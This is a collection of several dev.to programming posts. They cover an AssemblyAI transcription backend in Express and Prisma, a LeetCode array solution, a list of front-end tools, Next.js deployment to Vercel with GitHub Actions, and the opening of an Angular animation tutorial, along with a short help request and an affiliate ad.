Semoga dengan artikel ini bisa membantu anda yang baru memulai perjalanan sebagai Developer atau yang masih sering mengetik program tanpa membuat _Flowchart_ bisa mulai meningkatkan efesiensi dan konsistensi dalam mengetik program. Terima kasih dan Selamat menggambar! 🎉✍
[0wx.dev](https://0wx.dev) | 0wx |
738,835 | Summarize Zoom Meetings with Assembly AI | Introduction If you've ever wanted to quickly and accurately get your zoom meeting, or any... | 0 | 2021-07-23T23:20:02 | https://dev.to/guilleeh/summarize-zoom-meetings-with-assembly-ai-m3i | assemblyai, node, express | ## Introduction
If you've ever wanted to quickly and accurately get your zoom meeting, or any kind of speech turned into text, then Assembly AI is the API you need. Today I will be covering how to create a simple backend API to handle mp3 file uploads and converting them to PDF files with the transcript included. I will also show sign-in and sign-up functionality as a bonus.
### What is Assembly AI?
"AssemblyAI is a top rated API for speech recognition, trusted by startups and global enterprises in production" - Assembly AI Website
It is very simple to get started with turning speech to text, and you can do it in just 2 minutes here: https://docs.assemblyai.com/overview/getting-started
You can get your API key here: https://app.assemblyai.com/login/
**Note**: You are limited to 3 hours of processing time for the month with this API.
## Backend Stack
The following technologies will be used to build our backend.
- PostgreSQL
- Node.js
- Express
- Prisma ORM
- Bcrypt
- JWT
- pdfkit
## Requirements
You will need PostgreSQL in your system. I use this software: [PostgreSQL](https://postgresapp.com/)
Once PostgreSQL is installed, you will have to create the database and user with the following commands
```
$ createdb zoom-summarizer
$ createuser -P -s -e zoom_summarizer_user
```
Next, clone my express-prisma-starter to have the same code: [Code Starter](https://github.com/guilleeh/express-prisma-starter)
Create a .env file inside the repo, and include this so that Prisma knows the database to connect to.
```
DATABASE_URL = 'postgresql://zoom-summarizer-user@localhost:5432/zoom-summarizer'
```
Lastly, install the dependencies and run the migration to setup the tables.
```
$ npm i
$ npx prisma migrate dev --name init
```
## Development
**If you want to skip to the point where we use the Assembly AI API, click [here]()**
### Sign Up
We will start off with the sign up page, where we will collect a name, email and password. Don't worry, we are going to hash the password of course.
Inside your source folder, create a new folder called **db**, with a file called **db.js**. In here, we will have all database calls. We are doing this to decouple the data layer from the business logic and routes.
- Add create user CRUD in db.js
```javascript
const { PrismaClient } = require("@prisma/client");
const prisma = new PrismaClient();
// CREATE
const createUser = async (email, password, name) => {
const result = await prisma.user.create({
data: {
email,
password,
name,
},
});
return result;
};
module.exports = {
createUser,
};
```
- Add post route for sign up in index.js
```javascript
const db = require("./db/db");
const bcrypt = require("bcrypt");
const jwtService = require("jsonwebtoken");
const express = require("express");
const app = express();
app.use(express.json());
app.get(`/`, async (req, res) => {
res.json({ success: true, data: "Hello World!" });
});
app.post("/signup", async (req, res) => {
const { email, password, name } = req.body;
if (!email || !password || !name) {
res.status(400).json({
success: false,
error: "Email, password and name are required.",
});
return;
}
try {
// hash password
const salt = await bcrypt.genSalt(Number(process.env.SALT_ROUNDS));
const passwordHash = await bcrypt.hash(password, salt);
// create user
const response = await db.createUser(email, passwordHash, name);
res.json({ success: true, data: response });
} catch (e) {
console.log(e);
res.status(409).json({
success: false,
error: "Email account already registered.",
});
}
});
```
To test, hit http://localhost:3001/signup with a POST request with the body:
```JSON
{
"email": "memo@memo.com",
"password": "123",
"name": "Guillermo"
}
```
And that's it for the sign up endpoint! Pretty straight forward. We use bcrypt to hash the password. If possible though, you should use a more serious solution if you want to take this to production. This was a quick implementation.
### Sign In
Now that we can register users, it's time to log them in. We will be using JWT tokens in order to keep track of sessions. This is not the most secure method(like refresh tokens), but it will do for this tutorial.
We're going to create another folder inside src, called **lib**. Here we are going to put any code dealing with jwt, aws and pdfkit.
Create the folder lib and the file **jwt.js**
- lib/jwt.js
```javascript
const jwt = require("jsonwebtoken");
const getJWT = async (id, email) => {
try {
return jwt.sign(
{
email,
id,
},
process.env.JWT_SECRET,
{
expiresIn: Number(process.env.JWT_EXPIRE_TIME),
}
);
} catch (e) {
throw new Error(e.message);
}
};
const authorize = (req, res, next) => {
// middleware to check if user is logged in
try {
const token = req.headers.authorization.split(" ")[1];
jwt.verify(token, process.env.JWT_SECRET);
next();
} catch (error) {
res.status(401).json({ success: false, error: "Authentication failed." });
}
};
module.exports = {
getJWT,
authorize,
};
```
Here, getJWT will give us a token for the frontend to store, and authorize is a middleware we will be using in protected routes to make sure a user is logged in.
Next, replace this line on top of the index.js file:
```javascript
const jwtService = require("jsonwebtoken");
```
With this line:
```javascript
const jwtLib = require("./lib/jwt");
```
Now we need to get a user by the email they entered, in order to compare passwords.
Add this function to **db.js**:
db.js
```javascript
// READ
const getSingleUserByEmail = async (email) => {
const user = await prisma.user.findFirst({
where: { email },
});
return user;
};
module.exports = {
createUser,
getSingleUserByEmail
};
```
To finish off this sign-in endpoint, we will create a post route for it inside of **index.js**
index.js
```javascript
app.post("/signin", async (req, res) => {
const { email, password } = req.body;
if (!email || !password) {
res
.status(400)
.json({ success: false, error: "Email and password are required." });
return;
}
try {
// Find user record
const user = await db.getSingleUserByEmail(email);
if (!user) {
res.status(401).json({ success: false, error: "Authentication failed." });
return;
}
// securely compare passwords
const match = await bcrypt.compare(password, user.password);
if (!match) {
res.status(401).json({ success: false, error: "Authentication failed." });
return;
}
// get jwt
const jwtToken = await jwtLib.getJWT(user.id, user.email);
// send jwt and user id to store in local storage
res
.status(200)
.json({ success: true, data: { jwt: jwtToken, id: user.id } });
} catch (e) {
console.log(e);
res.status(500).json({
success: false,
error: `Authentication failed.`,
});
}
});
```
### Upload & Audio Processing
Now we finally get to the part where we use the Assembly AI API in order to get a transcript of our mp3 files!
First, we will upload our files to S3 so that the Assembly AI API has a place to pull the audio from.
Inside of **src/lib**, create a new file called **aws.js**.
aws.js
```javascript
const AWS = require("aws-sdk");
s3 = new AWS.S3({ apiVersion: "2006-03-01" });
const uploadFile = async (file) => {
const params = {
Bucket: process.env.AWS_S3_BUCKET_NAME,
Key: file.name,
Body: file.data,
};
try {
const stored = await s3.upload(params).promise();
return stored;
} catch (e) {
console.log(e);
throw new Error(e.message);
}
};
module.exports = {
uploadFile,
};
```
This code will take care of our s3 file uploads.
Next we will create the last library file called **pdf.js** inside lib. Here we will take care of turning the text from the Assembly AI API into a nice pdf format.
pdf.js
```javascript
const PDF = require("pdfkit");
const generatePdf = (title, text, terms, res) => {
const pdf = new PDF({ bufferPages: true });
let buffers = [];
pdf.on("data", buffers.push.bind(buffers));
pdf.on("end", () => {
let pdfData = Buffer.concat(buffers);
res
.writeHead(200, {
"Content-Length": Buffer.byteLength(pdfData),
"Content-Type": "application/pdf",
"Content-disposition": `attachment;filename=${title}.pdf`,
})
.end(pdfData);
});
pdf.font("Times-Roman").fontSize(20).text(title, {
align: "center",
paragraphGap: 20,
});
pdf.font("Times-Roman").fontSize(12).text(text, {
lineGap: 20,
});
if (terms) {
const termsArr = terms.results.sort((a, b) => b.rank - a.rank);
const cleanedTerms = termsArr.map((term) => term.text);
pdf.font("Times-Roman").fontSize(16).text("Key Terms", {
align: "center",
paragraphGap: 20,
});
pdf
.font("Times-Roman")
.fontSize(12)
.list(cleanedTerms, { listType: "numbered" });
}
pdf
.fillColor("gray")
.fontSize(12)
.text(
"Transcript provided by AssemblyAI ",
pdf.page.width - 200,
pdf.page.height - 25,
{
lineBreak: false,
align: "center",
}
);
pdf.end();
};
module.exports = {
generatePdf,
};
```
The format of the pdf is really up to you, this is a basic paragraph and a list of key terms.
We also need to store the transcriptId that the AssemblyAI API gives us to later get the transcript text, so we will create db functions for it inside db.js
db.js
```javascript
const createRecording = async (name, s3Key, transcriptId, email) => {
const result = await prisma.recording.create({
data: {
name,
s3Key,
transcriptId,
user: {
connect: {
email,
},
},
},
});
return result;
};
const getSingleUserById = async (id) => {
const user = await prisma.user.findFirst({
where: { id },
});
return user;
};
module.exports = {
createUser,
createRecording,
getSingleUserByEmail,
getSingleUserById,
};
```
Lastly, we can put this all together to upload an mp3 file, call the Assembly AI API to process that file from S3, and save the transcript Id to later fetch the transcript as a pdf file.
Your index.js file should look like this:
index.js
```javascript
const db = require("./db/db");
const jwtLib = require("./lib/jwt");
const awsLib = require("./lib/aws");
const pdfLib = require("./lib/pdf");
const fetch = require("node-fetch");
const bcrypt = require("bcrypt");
const express = require("express");
const fileUpload = require("express-fileupload");
const cors = require("cors");
const { response } = require("express");
const app = express();
app.use(cors());
app.use(express.json());
app.use(fileUpload());
.
.
.
app.post("/upload", jwtLib.authorize, async (req, res) => {
const { id } = req.body;
if (!id) {
return res
.status(400)
.json({ success: false, error: "You must provide the user id." });
}
if (!req.files || Object.keys(req.files).length === 0) {
return res
.status(400)
.json({ success: false, error: "No files were uploaded." });
}
try {
const file = req.files.uploadedFile;
// upload to s3
const uploadedFile = await awsLib.uploadFile(file);
const { Location, key } = uploadedFile;
const body = {
audio_url: Location,
auto_highlights: true,
};
// call aai api
const response = await fetch(process.env.ASSEMBLYAI_API_URL, {
method: "POST",
body: JSON.stringify(body),
headers: {
authorization: process.env.ASSEMBLYAI_API_KEY,
"content-type": "application/json",
},
});
const result = await response.json();
if (result.error) {
console.log(result);
res.status(500).json({
success: false,
error: "There was an error uploading your file.",
});
return;
}
// get user email
const user = await db.getSingleUserById(Number(id));
const { email } = user;
// save transcript id to db
const recording = await db.createRecording(
file.name,
key,
result.id,
email
);
res.status(200).json({ success: true, data: recording });
} catch (e) {
console.log(e);
res.status(500).json({
success: false,
error: "There was an error uploading your file.",
});
}
});
```
Notice that we use the authorize middleware for this endpoint and we also need to send the user Id that you get once you log in.
All we need now is an endpoint to generate our pdf, which is what we will get to now.
Let's add a db function to get the transcript we saved.
db.js
```javascript
const getSingleRecording = async (transcriptId) => {
const recording = await prisma.recording.findFirst({
where: {
transcriptId,
},
});
return recording;
};
module.exports = {
createUser,
createRecording,
getSingleUserByEmail,
getSingleUserById,
getSingleRecording,
};
```
And now we can create the endpoint to generate a pdf
```javascript
app.post("/generate-pdf", jwtLib.authorize, async (req, res) => {
const { transcriptId } = req.body;
if (!transcriptId) {
return res
.status(400)
.json({ success: false, error: "You must provide the transcript id." });
}
try {
const url = process.env.ASSEMBLYAI_API_URL + "/" + transcriptId;
const response = await fetch(url, {
method: "GET",
headers: {
authorization: process.env.ASSEMBLYAI_API_KEY,
"content-type": "application/json",
},
});
const result = await response.json();
if (result.error) {
console.log(result);
res.status(500).json({
success: false,
error: "There was an error retrieving your recording.",
});
return;
}
const { text, auto_highlights_result } = result;
const recordingRecord = await db.getSingleRecording(transcriptId);
const { name } = recordingRecord;
pdfLib.generatePdf("Transcript", text, auto_highlights_result, res);
} catch (e) {
console.log(e);
res.status(500).json({
success: false,
error: "There was an error retrieving your recordings.",
});
}
});
```
Now you just need to provide the endpoint the transcriptId you saved in the database and it will return a pdf file for you!
### Wrap up
That's it! You have a basic app that allows users to sign in/up, upload mp3 conversations and get transcripts back in pdf formats. There is tons of room for growth in this project, and if you would like to try it out for yourself, check the links below.
Source Code: https://github.com/guilleeh/zoom-summarizer
Demo: https://zoom-summarizer.vercel.app/
The source code is a full stack application, so you can see how I put this all together.
Hope you all learned something today!
| guilleeh |
738,904 | Leetcode Array Problem Solutions (Remove Duplicates From Sorted Array) | In today's article, we are going to solve another leetcode problem and the statement for today's... | 0 | 2021-06-25T08:11:06 | https://dev.to/saurabhnative/leetcode-array-problem-solutions-remove-duplicates-from-sorted-array-236f | leetcode, javascript, interviewquestions, competitiveprogramming | In today's article, we are going to solve another leetcode problem and the statement for today's problem is to remove duplicate from a sorted array.
Link to the problem:-
https://leetcode.com/explore/learn/card/fun-with-arrays/511/in-place-operations/3258/
Agenda:-
- We are going to remove duplicate elements from a sorted array using javascript.
- We will also learn how to use the splice method to remove elements from an array.
We are given an integer array which is called nums with elements sorted in non-decreasing order, that is the elements will be in ascending order. We need to remove the duplicates, but they should be inplace that is we cannot clone the array or create another array for removing the duplicates, we need to do it in the same array itself.
The order of the elements should also be kept as it is after removing duplicates. We are supposed to return the length of the array after removing duplicate elements.
Let's build a solution to the problem step by step:-
Since we need to remove duplicates from this array obviously we need to iterate it over once, so we can either use for loop or map function to iterate over the input array:-
```
const removeDuplicates = function(nums) {
nums.map((element, index) => {
console.log("element", element);
console.log("index", index);
});
}
```
Within every iteration or cycle of this loop, we need to check whether duplicates exist. We can see if the next element is a duplicate by using if condition as shown below:-
```
...
console.log("index", index);
if(element === nums[index+1]) {
// code to remove duplicate elements
}
```
We need to declare a variable to keep a track of duplicate elements. If a duplicate element exists then we will increment the value of this variable. To calculate the total number of duplicate elements we will run a for loop from the next element of the current index to the length of the array as shown below:-
```
...
if(element === nums[index+1]) {
let numberOfDuplicates = 0;
for(let i=index+1;i<nums.length;i++) {
if(nums[i] === element) {
++numberOfDuplicates;
} else {
break;
}
}
console.log("numberOfDuplicates", numberOfDuplicates);
}
```
We have added a break statement in the else block so that we can stop iteration once the total number of duplicate elements are calculated.
Next, we need to remove the duplicate elements from the array for which are going to use the array [splice](https://www.w3schools.com/jsref/jsref_splice.asp) method. In the case of splice, the first input is generally the index from which we need to remove or add the indices and the second input is the total number of elements we need to remove.
In our case, we need to remove the elements from next index of current elements and the total elements to be removed are total number of duplicate elements stored in the `numberOfDuplicates` variable above.
So the final solution to the problem is as shown below:-
```
const removeDuplicates = function(nums) {
nums.map((element, index) => {
console.log("element", element);
console.log("index", index);
if(element === nums[index+1]) {
let numberOfDuplicates = 0;
for(let i=index+1;i<nums.length;i++) {
if(nums[i] === element) {
++numberOfDuplicates;
} else {
break;
}
}
// console.log("numberOfDuplicates", numberOfDuplicates);
nums.splice(index+1, numberOfDuplicates);
}
});
// console.log("output array", nums);
return nums.length;
};
```
We return the length of the array in the end since it is asked in the problem statement. If we run this solution on leetcode it is accepted for all the test cases. We have commented `console.log` statements in the final solution since they are no longer required.
After we've finished any kind of computer programming problem, we usually go for time complexity calculation. We have a map function at the top which can be considered as a for loop and there is an inner for loop for calculation duplicate elements. So with nested for loops like this time complexity for the solution would be O(n<sup>2</sup>).
Now, there might be some better solutions that might reduce the time complexity but I have covered the simplest possible solution that I could think of. As we learn more data structures and algorithms in future, we will try to come up with better solutions.
You can view video explanation for the problem below:-
{% youtube zKcNYIsrq4s %}
If you found this tutorial useful, hit the like button, follow my blog, and if there is anyone you know who will benefit from such articles in data structures in JavaScript or preparing for interviews, please share it with them as well. Goodbye and have a nice day.
---------------------------------------------------------------------------------------------------
Join my discord server for help :
🌐 discord server: https://discord.gg/AWbhSUWWaX
---------------------------------------------------------------------------------------------------
Suggestions and Feedback
🐦 TWITTER: https://twitter.com/saurabhnative
🎥 INSTAGRAM: https://www.instagram.com/saurabhnative/?hl=en
---------------------------------------------------------------------------------------------------
For collaboration, connect with me on Twitter
🐦 TWITTER: https://twitter.com/saurabhnative
---------------------------------------------------------------------------------------------------
Support me on Kofi
🤝 https://ko-fi.com/saurabhmhatre
---------------------------------------------------------------------------------------------------
| saurabhnative |
738,963 | Creating a group | Hey there pls help me. Can anybody tell me that how to create a group at dev.to/connect because I... | 0 | 2021-06-25T09:25:00 | https://dev.to/darshkul24/creating-a-group-1bbi | help, discuss, dev, group | Hey there pls help me. Can anybody tell me that how to create a group at dev.to/connect because I don't know pls your help will be greate
Thanks for reading my post please press the like and the unicorn button while going.
Thank you
Darsh kulthia | darshkul24 |
739,051 | 😍 Earn 40% For Every Customer ( ≈ $23 / Sale ) | Hello👋, We are very happy to announce Frontendor affiliate program. Frontendor lets developers... | 0 | 2021-06-25T10:30:51 | https://dev.to/frontendor/earn-40-for-every-customer-23-sale-190o | Hello👋,
We are very happy to announce Frontendor affiliate program.
Frontendor lets developers construct gorgeous landing pages quickly and easily by using a simple copy-paste method. This current deal is Frontendor 2.0!
Your efforts are valuable to us and that is why we offer a high commission percentage.
✅ 30 days cookie duration.
✅ Get paid instantly ( Using Gumroad ).
✅ Exclusive Affiliate Kit.
Join our affiliate program today! :
https://frontendor.com/affiliates/ | frontendor | |
739,156 | Tools for Web Developers To Work Smarter and not Harder | "A man is only as good as his tools" -Emmert Wolf In the software development... | 0 | 2021-06-25T13:30:23 | https://vickyikechukwu.hashnode.dev/tools-for-web-developers-to-work-smarter-and-not-harder | webdev, frontend, productivity, tutorial | <blockquote>
"A man is only as good as his tools" <br>
<span> -Emmert Wolf</span>
</blockquote>
In the software development industry. This would closely mean `A Developer is only as good as his tools`. As the difference in the productivity levels of two developers with the same technical knowledge is sometimes based on their toolset.
Hello There 👋, Beautiful Coder on the internet. Welcome back to my blog. In this blog, I write articles about tech, programming, and my life as a teenage developer. In this article, I'm going to round up some of the most interesting front-end developer tools of 2021. Which you will definitely find useful for your own development workflow.
The key to being a productive developer is to work smarter and not harder. using tools that speed up most of the tasks that you do. Making you more productive and simplify your work.
These development tools aren't really the most popular or hottest in 2021 👉👈, but they do come in handy for me, simplifying my work and making me more productive. As am sure they will too for you 😏. Already excited, let’s get started.
## ⚙️ Web Developer

<div>
</div>
First up, <a href="">Web Developer</a>. This is definitely my favorite tool in the list, hence it comes first 😄. The <a href="https://chrispederick.com/work/web-developer/">Web Developer</a> is a browser extension that comes bundled with various **web developer tools**. Web Developer extension adds various web developer tools to a browser. Add it to your web browser and take development to the next level. The extension is available for Chrome, Firefox, and Opera.
Once installed. you can open a panel like this.

That gives you access to lot of amazing commands like, Toggle CSS and JavaScript for a site on or off, view the semantic structure of a site, inspect how it looks on various screen sizes, disable images to see if the have alt text. The list is endless 😄.
## QUOKKA.JS

`RAPID JAVASCRIPT PROTOTYPING IN YOUR EDITOR`
[Quokka](https://quokkajs.com/) is a developer productivity tool, That helps developers to rapidly prototype JavaScript or Typescript Code right in their code editor. Quokka makes **prototyping**,**learning** and **testing** JavaScript and Typescript code **blazingly fast**. With Quokka, there are no configurations required by default. All you need to do is simply start up a JavaScript/Typescript file and you are ready to go 👍.
To get started using Quokka, you can install it as an extension in your code editor. Head over to their website and get the version for your code editor and directions on how to set it up. Quokka has two editions, The **Community** edition which is free for everyone but has a few limitations, `bear this in mind 👀`. And a commercial **Pro** edition that provides some additional features but you have to pay for it.
Here's a sneak peek of it in action.

## Google Lighthouse
<!-- img -->

Coding is a very demanding task. And as such, it is common to make mistakes, decrease the overall quality of your site. And that's where Google Lighthouse comes in.
[Google Lighthouse](https://developers.google.com/web/tools/lighthouse/) is an open-source, automated development tool for testing/improving the quality of your web pages.
Google Lighthouse lets you audit(examine) your web applications based on several parameters, including performance, accessibility, mobile compatibility, Progressive Web App (PWA) implementations, SEO, and more. All you have to do is run it on a page or pass it a URL, sit back and get a very elaborate report with amazing feedback on how to improve the quality and performance of your site. All in just a few clicks.
You can get started with Google Lighthouse if you have the [Google Chrome for Desktop](https://www.google.com/chrome/browser/desktop/?) Browser. Or If you are a fan of the Command-Line, then you can use the [Lighthouse NPM package ](https://www.npmjs.com/package/lighthouse?&url=151?&url=85) and its CLI.
See this article on [using Google Lighthouse ](https://flexiple.com/developers/using-google-lighthouse-to-audit-your-web-application/).
## Grammerly
<div>

`Say Goodbye to Textfails`
</div>
One for the Technical writers. [Grammerly](https://www.grammarly.com/) is a writing assistant that puts your writing at its best. Grammerly scans what you write for common grammatical mistakes (like misused commas) and complex ones (like misplaced modifiers). Personally, as a technical writer. Grammerly has really helped me improve my writing skills and confidence in blogging, which has lead to better typo-free quality articles. As am sure it will for you 🙌.
## Webflow

[Web flow](https://www.webflow.com/) provides a modern way for pretty much anyone (even non-technical people) to design and build for the web. It is a free low-code platform for rapidly building custom responsive web apps in a visual canvas with no code. It automatically generates Html, CSS, and JavaScript codes from your designs. That your team can quickly import and plugin into the site's codebase.
With the help of Webflow, designing and building responsive web apps becomes as easy as drag and drop the UI components you need. There is no need to spend days or even months making UI/UX decisions, fighting with state management, setting up access control, or re-inventing the wheel. Saving everyone the stress of **repetitively coding everything from scratch** 😍. This is especially helpful if you freelance. Designing and launching web pages would only take a matter of days.
## Tabnine

Everyone's favorite AI code autocompletion tool 😄. Trusted by over 1 million developers in all programming languages. [Tabnine](https://www.tabnine.com/) helps developers write code with some magics. It's based on a system of deep learning to help developers **code faster, reduce mistakes, and discover best coding practices** using Machine Learning. It removes the burden of having to remember code syntax and lets you actually focus on writing **good** code. And writing it faster, which is the whole point of writing this article, right? 😏. start using Tabnine today to 10X your workflow 😎, by installing it as an extension in your code editor.
## Tailwind CSS

[Tailwind CSS](https://tailwindcss.com) is a utility-first framework for rapidly building custom user interface (UI) components. This means that, unlike other CSS libraries, it doesn’t provide pre-styled components and classes that’ll have all your projects looking the same (insert Bootstrap). Instead, it provides low-level utility classes for styling virtually every single CSS property like padding (e.g. pt-10), flex (e.g. justify-between), color (e.g. blue-600), and so on. This way, you get to build **unique custom interfaces**, **make better design decisions** because it limits your choices via limited class variations. You’ll also never have to worry about naming CSS classes anymore. In fact, With Tailwind CSS. you may almost never need to **write CSS again**. Awesome, right? 😃
If you want to start using Tailwind CSS for your project, see this article on <a class="inline-link" href="https://blog.logrocket.com/tailwind-css-is-it-tomorrows-bootstrap-ebe560f9d00b/">getting started with Tailwind CSS</a>.
## Daily.dev
[Daily.dev](https://daily.dev/) is a news aggregator, especially for software developers. to help them stay up to date with the latest news in tech. With daily.dev, you will stay updated with the best articles from the best tech publications on any topic. Get all the content you love in one place -- CSS-Tricks, Smashing Magazine, web.dev, hashnode, and +350 sources.
<h2>Conclusion</h2>
And that's it guys, I hope you are excited to start using these tools, cause I am too 😁, There are a ton more tools out there, but these are my top picks.
### Do you know more?
Also, if there’s any other amazing tool you’ve been using that has improved your workflow somehow, The ones you are getting excited to try out yet. Drop them in the comments!. Your Feedbacks are greatly appreciated! 🙌. I too, would love to expand my stash 😄. Have an amazing day!
**Enjoyed reading this as much as i enjoyed writing it for you? 😍** . support me 😃
<a href="https://www.buymeacoffee.com/molipa">
<img src="https://img.buymeacoffee.com/button-api/?text=Buy me a Coffee ☕ &emoji=🍦&slug=molipa&button_colour=40DCA5&font_colour=ffffff&font_family=Comic&outline_colour=000000&coffee_colour=FFDD00"></a>
there's nothing more I would like than we become friends on [Twitter](https://twitter.com/VectorIkechukwu) 💖
If you found this article helpful, please like and share it: really motivates me to publish more.
**Thanks so much for reading! 💖 And keep on coding! 👨💻.**
| iamvictor |
740,895 | UI Dev Newsletter #63 | content-visibility Idorenyin Udoh explains all about the content-visibility property in... | 0 | 2021-07-02T05:55:49 | https://mentor.silvestar.codes/reads/2021-06-28/ | html, css, javascript, a11y | - [content-visibility](https://bit.ly/3dkHgrr)
Idorenyin Udoh explains all about the content-visibility property in CSS.
- [Organize your CSS declarations alphabetically](https://bit.ly/2TarvN0)
Eric Bailey explains why organizing CSS declarations are essential and why using alphabetical order might be the best solution.
- [Using CSS to Enforce Accessibility](https://bit.ly/3jkBc6a)
Adrian Roselli lists some examples of how the CSS selector is keying off the HTML, what WCAG Success Criteria they help support, and if there are any gotchas.
- [Inherit, initial, unset, revert](https://bit.ly/3x5g9sk)
Peter-Paul Koch explains special CSS keywords you can use on any CSS property, where and when to use them to the greatest effect, and which ones should exist, but not.
- [GIFs on the web: A new way to bloat](https://bit.ly/3A6rk5R)
Doug Sillars shows how the Giphy platform loads an additional 300+ KB of code to your site when embedding GIFs.
- [Updating A 25-Year-Old Website](https://bit.ly/2U3Q8Ll)
Mads Stoumann shows how old code is sometimes unavoidable, either because of scope or costs, but it can teach you a thing or two.
- [DevToolsSnippets](https://bit.ly/2T3FoN6)
Manuel Matuzović shares a collection of front-end debugging script snippets to be used in the Sources panel in Chrome DevTools.
- [Can We](https://bit.ly/3A4QjGD)
Mehdi Merah shares a collection of websites focused on browser usage and features.
Happy coding!
[Subscribe to the newsletter here!](https://bit.ly/34155z3) | starbist |
739,170 | Nextjs CI/CD on Vercel with Github actions | In this post we'll learn how to set up CI/CD with Nextjs on vercel Prerequisite Github... | 0 | 2021-06-25T13:48:26 | https://dev.to/chuddyjoachim/nextjs-ci-cd-on-vercel-with-github-actions-7g7 | nextjs, react, github, vercel | In this post we'll learn how to set up **CI/CD** with **Nextjs** on **vercel**
#Prerequisite
* Github Account
* Vercel Account
#Getting Started
1. Create a new github repository
if you don't have a [**Github Account**](https://github.com/signup) 👈click here.
If so then proceed to creating a new repository

###proceed to add repository name and click on Create Repository

2. Create and add your **Vercel** Token/Secret to **Github Secrets**
if you don't have a [**VercelAccount**](https://vercel.com/signup) 👈click here.
If so then proceed to creating a **vercelToken**.
* Click on the *settings* tab on your dashboard

* Click on *Token* then *Create*

* Add Token name then click create -- copy token

3. Create new Nextjs app.
Create a new Next.js app using npx and change into the new directory:
```
npx create-next-app nextjs-vercel-ci-cd
cd nextjs-vercel-ci-cd
```
4. Add Git remote.
Using the unique address of the GitHub repo you created earlier, configure Git locally with the URI.
```
git remote add origin git@github.com:git-<username>/<project-name>.git
```
5. Add workflow file.
In your project root directory add a **workflow file**
wich will be in **.github/workflows/deploy.yml** -- or simply
```
touch .github/workflows/deploy.yml
```
6. Install **Vercel cli** globally on your machine
`npm i -g vercel`
Before you proceed, you need to know your project ID and org ID from Vercel. The simplest way to get this is to link your project to Vercel. You can do this by using `npx vercel link`.
When you ran the command, it will create a `.vercel` folder in your project with a `project.json` file. In that file, you will find the **projectId** and **orgId**, which you can use later in your GitHub Actions workflow.
You can save both values in the secrets input setting in your repository as inputs
Something else you need to configure is to disable GitHub for your project on Vercel. That way, you let Vercel know that you want to take over control, and it will not trigger when you push your code to GitHub.
To disable GitHub, you create a `vercel.json` file in the root of your project (if it does not yet exist), and add the following contents to it:
```
{
"version": 2,
"github": {
"enabled": false
}
}
```
7. Add values to your repo's **Github Secret**
You'll have to add the following token to your github secrets
**Vercel_Token**
**projectId**
**orgId**
and any other env token or secrets
##To do so.
Navigate to your **Github repository**, click on the settings tab.

1. click on secrets then 2. click on create new secret

Add secrets Name and Value

#######N.B You can add multiple secrets if you prefer
8. Edit workflow file.
in deploy.yml add..
```
name: deploy nexturl to vercel
on: [push, pull_request]
jobs:
vercel:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
```
If you're adding Enviroment variable e.g **.env.local** add the code bellow 👇.
The example bellow includes a *Mongodb* connections string and database name of which you must have added to your **Github secrets**
```
#add env file to .env.local
- name: Set Env Vars on Vercel Project
uses: dkershner6/vercel-set-env-action@v1
with:
token: ${{ secrets.VERCEL_TOKEN }}
teamId: ${{ secrets.VERCEL_TEAM_ID }} # optional, without will use personal
projectName: nexturl # project name in Vercel
envVariableKeys: MONGODB_URL,MONGODB_DB
env:
MONGODB_URL: ${{ secrets.MONGODB_URL }}
TARGET_MONGODB_URL: preview,development,production
# comma delimited, one of [production, preview, development]
TYPE_MONGODB_URL: encrypted # one of [plain, encrypted]
MONGODB_DB: ${{ secrets.MONGODB_DB }}
TARGET_MONGODB_DB: preview,development,production
TYPE_MONGODB_DB: encrypted
```
proceed to deployement to vercel by add the following code
```
# deploy app to vercel
- name: deploy site to vercel
uses: amondnet/vercel-action@v20
with:
vercel-token: ${{ secrets.VERCEL_TOKEN }} # Required
github-token: ${{ secrets.GITHUB_TOKEN }} #Optional
vercel-args: '--prod' #Optional
vercel-org-id: ${{ secrets.ORG_ID}} #Required
vercel-project-id: ${{ secrets.PROJECT_ID}} #Required
```
##Here's an example of a project i wich i deployed on vercel using github actions 👉 [NextUrl](https://nexturl.vercel.app/)
## Link to github repository 👉[Nexturl-github](https://github.com/chuddyjoachim/next-url)
## A star would be appreciated.
| chuddyjoachim |
739,360 | Animating Angular’s *ngIf and *ngFor | Jared Youtsey | ng-conf | May 2019 *ngIf and *ngFor will remove elements from the DOM. There isn’t a... | 0 | 2021-06-25T16:46:55 | https://dev.to/ngconf/animating-angular-s-ngif-and-ngfor-5e12 | angular, animation, css | Jared Youtsey | ng-conf | May 2019
`*ngIf` and `*ngFor` will remove elements from the DOM. There isn’t a CSS solution for animating a non-existing element in the DOM. But Angular provides us with a simple solution.
For purposes of brevity, wherever I refer to `*ngIf` it is equally applicable to `*ngFor`. The complete, working code can be downloaded [here](https://github.com/fivedice/ng-ngif-animations).
Let’s start with the default application generated by the CLI and just modify the nice Angular logo in and out of the view based on a button we add.
```
ng new ngifAnimation
```
You won’t need routing and can select SCSS for the styling.
Let’s add the button we want to use to toggle our `*ngIf` on the image. Open `app.component.html` and add a simple button: (this is the default HTML)
```
<!--The content below is only a placeholder and can be replaced.--
<div style="text-align:center">
<h1>Welcome to {{ title }}!</h1>
<button (click)="onClick()">Toggle Image</button>
...
```
Now let’s add the `onClick()` method to the class that toggles a public variable `showImage`:
```
export class AppComponent {
title = 'ngifAnimation';
showImage = false;
onClick() {
this.showImage = !this.showImage;
}
}
```
Now, let’s add the `*ngIf` in the template on the `<img>` tag:
```
<img
*ngIf="showImage"
width="300"
alt="Angular Logo"
src="..."
/>
```
Let’s add a little bit of CSS to force the button to stay put when the image pops in and out: (`app.component.scss`)
```
button {
display: block;
margin: 0 auto;
clear: both;
}
```
If you run the app now you’ll be able to click the button and the image will jarringly pop in and out of the view. If you check your developer tools, you’ll find that the `<img>` tag is popping in and out of the DOM. When `showImage` is false the `<img>` tag isn’t even present. This is where our inability to use CSS comes into play. It’s a terrible user experience to have elements, especially large ones, pop in and out without some transition. Let’s make it grow and fade in and out in a pleasing manner!
To handle animations (for way more reasons than just the one covered in this article) Angular provides the `BrowserAnimationsModule`. As of the latest Visual Studio Code, though, it doesn’t want to auto-import this module for you if you add it to your `AppModule` imports. It’s hidden in `@angular/platform-browser/animations`. Let’s add the import manually and add it to the module’s imports.
```
import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { AppComponent } from './app.component';
import { BrowserAnimationsModule } from '@angular/platform-browser/animations';
@NgModule({
declarations: [AppComponent],
imports: [BrowserModule, BrowserAnimationsModule],
providers: [],
bootstrap: [AppComponent]
})
export class AppModule {}
```
